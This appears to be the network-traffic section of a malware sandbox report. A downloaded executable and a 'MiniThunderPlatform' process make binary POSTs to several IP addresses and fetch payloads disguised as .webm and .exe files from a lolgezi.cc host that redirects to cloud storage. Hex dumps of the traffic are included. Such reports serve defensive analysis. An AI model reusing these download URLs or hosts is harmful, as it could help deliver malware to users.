                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Host: skinx.x1.lolgezi.cc
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Referer: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                                                                                            Nov 6, 2024 16:40:28.061156988 CET | 1236 | IN | HTTP/1.1 302 Found
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:27 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 1457
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                                                                                            Location: https://bjbgp01.baidupcs.com/file/0a382c0d6mc9d86e83dea8b6b711ec95?bkt=en-2e2b5030dd6ff03724ec2636891713b04491a2164193080372eba2827f42e3f49512226682b607da&fid=1103614021113-16051585-374161435003679&time=1730907627&sign=FDTAXUbGERQlBHSKfWqi-DCb740ccc5511e5e8fedcff06b081203-bBuDqT9nQKxRogvr657%2Fscy9g38%3D&to=75&size=28631040&sta_dx=28631040&sta_cs=283&sta_ft=webm&sta_ct=3&sta_mt=3&fm2=MH%2CBaoding%2CAnywhere%2C%2CNone%2Cany&ctime=1729845141&mtime=1729845141&dt3=23&resv0=-1&resv1=0&resv2=rlim&resv3=5&resv4=28631040&vuk=1103614021113&iv=0&vl=1&htype=&randtype=&tkbind_id=0&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=en-f0f082f0b29a322597b31898254f83c518207a420c13082998b3ef207def286c7bf2617df2ab6dfe&expires=8h&rt=pr&r=940755097&mlogid=7212653381263636982&vbdid=-&fin=SLBox241019_2.webm&fn=SLBox241019_2.webm&err_ver=1.0&rtype=1&clienttype=70&dp-logid=7212653381263636982&dp-callid=0.1.1&hps=1&tsl=0&csl=0&fsl=-1&csign=pnawazyXxvhDSfXVs1mpjf37Nwk%3D&so=0&ut=6&uter=4&serv=1&uc=280221178&ti=12146e4ff
                                                                                                                                            Nov 6, 2024 16:40:28.061285019 CET | 316 | IN | Data Raw: 37 64 66 33 63 39 63 38 34 35 64 32 61 31 62 39 31 35 39 65 34 30 32 63 32 31 62 66 35 34 30 63 34 62 37 35 36 39 26 68 66 6c 61 67 3d 33 30 26 66 72 6f 6d 5f 74 79 70 65 3d 31 26 61 64 67 3d 6e 26 72 65 71 6c 61 62 65 6c 3d 31 36 30 35 31 35 38
                                                                                                                                            Data Ascii: 7df3c9c845d2a1b9159e402c21bf540c4b7569&hflag=30&from_type=1&adg=n&reqlabel=16051585_d_831b808e43ac56a7fd3c1706a38d91ab_-1_769817cf1ab77604e3ebedabfe8c530f&fpath=_pcs_.appdata%2Fyoua%2Fweb&by=themisReferrer-Policy: no-referrerX-Cache: MISS
                                                                                                                                            Nov 6, 2024 16:40:28.061297894 CET | 1236 | IN | Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 6a 62 67 70 30 31 2e 62 61 69 64 75 70 63 73 2e 63 6f 6d 2f 66 69 6c 65 2f 30 61 33 38 32 63 30 64 36 6d 63 39 64 38 36 65 38 33 64 65 61 38 62 36 62 37 31 31 65 63 39 35 3f 62 6b 74 3d 65 6e
                                                                                                                                            Data Ascii: <a href="https://bjbgp01.baidupcs.com/file/0a382c0d6mc9d86e83dea8b6b711ec95?bkt=en-2e2b5030dd6ff03724ec2636891713b04491a2164193080372eba2827f42e3f49512226682b607da&amp;fid=1103614021113-16051585-374161435003679&amp;time=1730907627&amp;sign=FDT
                                                                                                                                            Nov 6, 2024 16:40:28.061309099 CET | 212 | IN | Data Raw: 62 39 31 35 39 65 34 30 32 63 32 31 62 66 35 34 30 63 34 62 37 35 36 39 26 61 6d 70 3b 68 66 6c 61 67 3d 33 30 26 61 6d 70 3b 66 72 6f 6d 5f 74 79 70 65 3d 31 26 61 6d 70 3b 61 64 67 3d 6e 26 61 6d 70 3b 72 65 71 6c 61 62 65 6c 3d 31 36 30 35 31
                                                                                                                                            Data Ascii: b9159e402c21bf540c4b7569&amp;hflag=30&amp;from_type=1&amp;adg=n&amp;reqlabel=16051585_d_831b808e43ac56a7fd3c1706a38d91ab_-1_769817cf1ab77604e3ebedabfe8c530f&amp;fpath=_pcs_.appdata%2Fyoua%2Fweb&amp;by=themis">Fou
                                                                                                                                            Nov 6, 2024 16:40:28.065299988 CET | 9 | IN | Data Raw: 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                            Data Ascii: nd</a>.


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            2 | 192.168.2.10 | 57267 | 140.206.225.136 | 80 | 8156 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Nov 6, 2024 16:40:26.855175018 CET | 334 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 140.206.225.136:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 204
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 6, 2024 16:40:27.897969007 CET | 98 | IN | HTTP/1.1 200 OK
                                                                                                                                            Content-Length: 28
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Connection: Close
                                                                                                                                            Nov 6, 2024 16:40:28.120946884 CET | 28 | IN | Data Raw: 3c 00 00 00 07 00 00 00 10 00 00 00 dc 5b 4f 23 c2 53 d9 2a d2 b3 a0 fb 5f 88 31 01


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            3 | 192.168.2.10 | 57268 | 112.64.218.154 | 80 | 8156 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Nov 6, 2024 16:40:27.365211010 CET | 381 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 112.64.218.154:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 252
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 6, 2024 16:40:28.425626040 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:28 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 1804
Nov 6, 2024 16:40:28.425759077 CET | 723 | IN
Nov 6, 2024 16:40:28.491256952 CET | 253 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 112.64.218.154:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 124
                                                                                                                                            Connection: Keep-Alive
Nov 6, 2024 16:40:28.847060919 CET | 719 | IN | HTTP/1.1 404 Not Found
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:28 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 537
                                                                                                                                            Connection: keep-alive
                                                                                                                                            ETag: "5e673b37-219"
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe <a href="http://nginx.org/r/error_log">error log</a> for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 57269 | 116.132.218.191 | 80 | 8156 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:27.377793074 CET | 318 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 116.132.218.191:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 188
                                                                                                                                            Connection: Keep-Alive
Nov 6, 2024 16:40:28.582917929 CET | 294 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:28 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 140


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 57280 | 116.132.218.191 | 80 | 8156 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:28.593162060 CET | 1519 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 116.132.218.191:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 1388
                                                                                                                                            Connection: Keep-Alive
Nov 6, 2024 16:40:29.728199005 CET | 294 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:29 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 140


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 57281 | 116.132.219.22 | 80 | 8156 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:28.880817890 CET | 172 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 116.132.219.22:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 44
                                                                                                                                            Connection: Keep-Alive
Nov 6, 2024 16:40:30.022912025 CET | 144 | IN | HTTP/1.1 200 OK
                                                                                                                                            Content-Length: 28
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:29 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 57291 | 140.206.225.136 | 80 | 8156 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:30.376255035 CET | 1615 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 140.206.225.136:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 1484
                                                                                                                                            Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 57300 | 107.148.237.1 | 80 | 5956 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:32.364953995 CET | 398 | OUT | GET /d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_241019_1.exe HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-CH
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Host: skinx.x1.lolgezi.cc
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Referer: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Nov 6, 2024 16:40:33.537075043 CET | 804 | IN | HTTP/1.1 302 Found
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:33 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 245
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                                                                                            Location: https://download6.mcloud.139.com:443/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dJdEF5Q0tv&un=D520D8ADC384964E306AF1AA3DEEAF44A0596F6CB5C8600FE560D3DA9892C32B&dom=D930&rate=0&txType=0
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            X-Cache: MISS
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            Data Ascii: <a href="https://download6.mcloud.139.com:443/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dJdEF5Q0tv&amp;un=D520D8ADC384964E306AF1AA3DEEAF44A0596F6CB5C8600FE560D3DA9892C32B&amp;dom=D930&amp;rate=0&amp;txType=0">Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.10 | 57304 | 140.206.225.136 | 80 | 5956 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:33.173594952 CET | 498 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 140.206.225.136:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 368
                                                                                                                                            Connection: Keep-Alive
Nov 6, 2024 16:40:33.974281073 CET | 98 | IN | HTTP/1.1 200 OK
                                                                                                                                            Content-Length: 36
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Connection: Close
Nov 6, 2024 16:40:34.188267946 CET | 36 | IN | Data Raw: 20 00 00 00 17 5c 01 be c0 f8 71 c6 5b 23 17 9b 7f 1b 79 84 b2 92 d5 e4 49 82 bf 22 1f 75 17 32 a6 17 26 4b
                                                                                                                                            Data Ascii: \q[#yI"u2&K


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.10 | 57306 | 116.132.218.191 | 80 | 5956 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:33.552021980 CET | 482 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 116.132.218.191:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 352
                                                                                                                                            Connection: Keep-Alive
Nov 6, 2024 16:40:34.683307886 CET | 302 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:34 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 148


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.10 | 57307 | 116.132.218.191 | 80 | 5956 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:33.557415009 CET | 382 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 116.132.218.191:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 252
                                                                                                                                            Connection: Keep-Alive
Nov 6, 2024 16:40:34.697499037 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:34 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 1804
Nov 6, 2024 16:40:34.697521925 CET | 723 | IN
Nov 6, 2024 16:40:34.806114912 CET | 254 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 116.132.218.191:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 124
                                                                                                                                            Connection: Keep-Alive
Nov 6, 2024 16:40:35.196080923 CET | 719 | IN | HTTP/1.1 404 Not Found
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:35 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 537
                                                                                                                                            Connection: keep-alive
                                                                                                                                            ETag: "5e673b37-219"
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe <a href="http://nginx.org/r/error_log">error log</a> for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.10 | 57317 | 116.132.218.191 | 80 | 5956 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:34.811548948 CET | 690 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 116.132.218.191:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 560
                                                                                                                                            Connection: Keep-Alive
Nov 6, 2024 16:40:36.059514999 CET | 302 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:35 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 148


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.10 | 57318 | 140.206.225.136 | 80 | 5956 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:34.811568022 CET | 334 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 140.206.225.136:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 204
                                                                                                                                            Connection: Keep-Alive
Nov 6, 2024 16:40:36.492095947 CET | 98 | IN | HTTP/1.1 200 OK
                                                                                                                                            Content-Length: 44
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Connection: Close
Nov 6, 2024 16:40:36.709439039 CET | 44 | IN | Data Raw: 3d 00 00 00 0b 00 00 00 20 00 00 00 2a cd 23 36 43 99 2f b3 e0 de 14 e1 d3 87 08 3b c7 7e 2e 92 f8 5a 81 3e 01 ed af 0c e7 1f 6e ac
                                                                                                                                            Data Ascii: = *#6C/;~.Z>n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.10 | 57326 | 116.132.219.22 | 80 | 5956 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:36.401091099 CET | 321 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 116.132.219.22:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 192
                                                                                                                                            Connection: Keep-Alive
Nov 6, 2024 16:40:37.546892881 CET | 152 | IN | HTTP/1.1 200 OK
                                                                                                                                            Content-Length: 36
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:37 GMT
                                                                                                                                            Data Raw: 20 00 00 00 70 2d 6f 39 2a 1c c9 3f b2 8b 47 5d f1 c2 32 57 d0 3c c5 43 59 3a 42 a5 32 c9 9d bb 72 d5 9b f6
                                                                                                                                            Data Ascii: p-o9*?G]2W<CY:B2r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.10 | 57343 | 140.206.225.136 | 80 | 5956 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:38.294295073 CET | 786 | OUT | POST / HTTP/1.1
                                                                                                                                            Host: 140.206.225.136:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 656
                                                                                                                                            Connection: Keep-Alive
Nov 6, 2024 16:40:39.252748013 CET | 98 | IN | HTTP/1.1 200 OK
                                                                                                                                            Content-Length: 36
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Connection: Close
Nov 6, 2024 16:40:39.466953993 CET | 36 | IN | Data Raw: 20 00 00 00 4d db 9b 92 49 24 03 ef ec 0d 2e b0 1b 18 a0 ba 6a 0e 06 c5 53 7a 0c 4f 15 64 15 ac 5b 57 76 09
                                                                                                                                            Data Ascii: MI$.jSzOd[Wv


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.10 | 57355 | 107.148.237.1 | 80 | 7512 | C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:41.403122902 CET | 185 | OUT | GET /d/PanAlistPhoto/SLCoreAssets254_2.webm HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: skinx.x1.lolgezi.cc
                                                                                                                                            Cache-Control: no-cache
Nov 6, 2024 16:40:42.767534018 CET | 1236 | IN | HTTP/1.1 302 Found
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:42 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 1462
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                                                                                            Location: https://bjbgp01.baidupcs.com/file/350f2ed90l674df0a13399cb294b0863?bkt=en-82d2bca2fdceac3fabfb1ed2452331aa4ea92c5a28680a39063f76c7d20de64ee244b6b41ae7090f&fid=1103614021113-16051585-129100381070572&time=1730907642&sign=FDTAXUbGERQlBHSKfWqi-DCb740ccc5511e5e8fedcff06b081203-r6WwRtBhYnf79bsQAZEomL42rw0%3D&to=75&size=5941360&sta_dx=5941360&sta_cs=317&sta_ft=webm&sta_ct=3&sta_mt=3&fm2=MH%2CYangquan%2CAnywhere%2C%2CNone%2Cany&ctime=1729728590&mtime=1729728590&dt3=24&resv0=-1&resv1=0&resv2=rlim&resv3=5&resv4=5941360&vuk=1103614021113&iv=0&vl=1&htype=&randtype=&tkbind_id=0&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=en-3cf4596bf0ad06de52fd9a80914cd67c97711c5c404e764460b4925d0024dd1473b613b062ffe5bb&expires=8h&rt=pr&r=569376143&mlogid=7212657344168653326&vbdid=-&fin=SLCoreAssets254_2.webm&fn=SLCoreAssets254_2.webm&err_ver=1.0&rtype=1&clienttype=70&dp-logid=7212657344168653326&dp-callid=0.1.1&hps=1&tsl=0&csl=0&fsl=-1&csign=pnawazyXxvhDSfXVs1mpjf37Nwk%3D&so=0&ut=6&uter=4&serv=1&uc=3871693838&ti=3996


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 57312 | 36.138.50.131 | 443 | 5956 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-06 15:40:36 UTC | 493 | OUT | GET /storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dJdEF5Q0tv&un=D520D8ADC384964E306AF1AA3DEEAF44A0596F6CB5C8600FE560D3DA9892C32B&dom=D930&rate=0&txType=0 HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-CH
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Host: download6.mcloud.139.com
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Referer: https://download6.mcloud.139.com/storageWeb/servlet
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2024-11-06 15:40:37 UTC | 394 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: Tengine
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:36 GMT
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Length: 189752013
                                                                                                                                            Connection: close
                                                                                                                                            Content-Disposition: attachment;filename="%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_241019_1.exe"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Last-Modified: Sun, 20 Oct 2024 05:14:57 GMT
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 57356 | 113.200.1.7 | 443 | 7512 | C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-06 15:40:44 UTC | 1346 | OUT | GET /file/350f2ed90l674df0a13399cb294b0863?bkt=en-82d2bca2fdceac3fabfb1ed2452331aa4ea92c5a28680a39063f76c7d20de64ee244b6b41ae7090f&fid=1103614021113-16051585-129100381070572&time=1730907642&sign=FDTAXUbGERQlBHSKfWqi-DCb740ccc5511e5e8fedcff06b081203-r6WwRtBhYnf79bsQAZEomL42rw0%3D&to=75&size=5941360&sta_dx=5941360&sta_cs=317&sta_ft=webm&sta_ct=3&sta_mt=3&fm2=MH%2CYangquan%2CAnywhere%2C%2CNone%2Cany&ctime=1729728590&mtime=1729728590&dt3=24&resv0=-1&resv1=0&resv2=rlim&resv3=5&resv4=5941360&vuk=1103614021113&iv=0&vl=1&htype=&randtype=&tkbind_id=0&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=en-3cf4596bf0ad06de52fd9a80914cd67c97711c5c404e764460b4925d0024dd1473b613b062ffe5bb&expires=8h&rt=pr&r=569376143&mlogid=7212657344168653326&vbdid=-&fin=SLCoreAssets254_2.webm&fn=SLCoreAssets254_2.webm&err_ver=1.0&rtype=1&clienttype=70&dp-logid=7212657344168653326&dp-callid=0.1.1&hps=1&tsl=0&csl=0&fsl=-1&csign=pnawazyXxvhDSfXVs1mpjf37Nwk%3D&so=0&ut=6&uter=4&serv=1&uc=3871693838&ti=39965399e74cce84af8a76d067ba343c3eb28ff7aebe9176&hfl [TRUNCATED]
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Host: bjbgp01.baidupcs.com
                                                                                                                                            Connection: Keep-Alive
2024-11-06 15:40:45 UTC | 620 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:44 GMT
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Connection: close
                                                                                                                                            x-bs-file-size: 5941360
                                                                                                                                            x-bs-meta-crc32: 1681592990
                                                                                                                                            Cache-Control: max-age=259200
                                                                                                                                            ETag: bfb790ca20b4b1be024290b90fae4b4b
                                                                                                                                            x-bs-client-ip: MTczLjI1NC4yNTAuODA=
                                                                                                                                            Content-Length: 5941360
                                                                                                                                            x-bs-request-id: MTAuMzkuMTI1LjE2OjMwMDI6NzIxMjY1NzM0NDE2ODY1MzMyNjoyMDI0LTExLTA2IDIzOjQwOjQ0
                                                                                                                                            Content-Disposition: attachment;filename="SLCoreAssets254_2.webm"
                                                                                                                                            Content-MD5: bfb790ca20b4b1be024290b90fae4b4b
                                                                                                                                            superfile: 2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Last-Modified: Thu, 24 Oct 2024 00:09:50 GMT
                                                                                                                                            Server: POMS/CloudUI 1.0
                                                                                                                                            Data Ascii: fk[!RMfG a\eoId;G oY&sG feoG u.4K3*WU$T} Utt} U$} "U} Zv/7uGZ3uh3V[ t7N[/O]P"%;wE_4'A~HSdlo2w$_b]
                                                                                                                                            2024-11-06 15:40:45 UTC16384INData Raw: 8b 05 89 87 20 a2 7f 93 a1 c1 08 cc 03 9d 89 87 20 de 53 bb a1 c1 08 14 1b f5 89 87 20 3a d7 23 a1 c1 08 1c 4b bd 89 87 20 eb 31 f2 f8 1d b5 c2 56 63 2b a4 c9 30 5c 5c e7 c3 68 d0 5d 2e 7f 24 66 f9 96 00 5e 62 77 64 16 f3 5b 05 fd e5 8f 44 1f e6 56 b9 9e 42 0f 7b 43 43 ea e5 c0 ea 17 d0 7e ff b6 24 40 75 93 05 c2 a3 58 4b 40 7e 56 b9 9e ba a0 7a 7a 33 2f f7 3f 32 f7 44 3b d9 89 87 20 86 4b cf a1 c1 08 dc 9f 69 89 87 20 a6 ff 77 a1 c1 08 e8 63 f1 89 87 20 f6 83 37 a1 c1 08 d4 df 21 89 87 20 7f fd f2 f8 1d 01 5e ca 63 2b a4 bd 98 80 90 e7 c3 68 e4 21 2e 7f 24 1a f9 96 00 5e 62 77 64 95 47 af 05 fd e5 7b 40 4b 12 56 b9 9e b6 cb 30 3f 43 ea e5 3b a1 44 54 7e ff b6 c0 a3 1e 0f 05 c2 a3 b3 8f 24 7a 56 b9 9e 69 4b 06 7a 33 2f 19 d1 27 e7 24 a7 4f 1e db e2 9b 7d
                                                                                                                                            Data Ascii: S :#K 1Vc+0\\h].$f^bwd[DVB{CC~$@uXK@~Vzz3/?2D; Ki wc 7! ^c+h!.$^bwdG{@KV0?C;DT~$zViKz3/'$O}
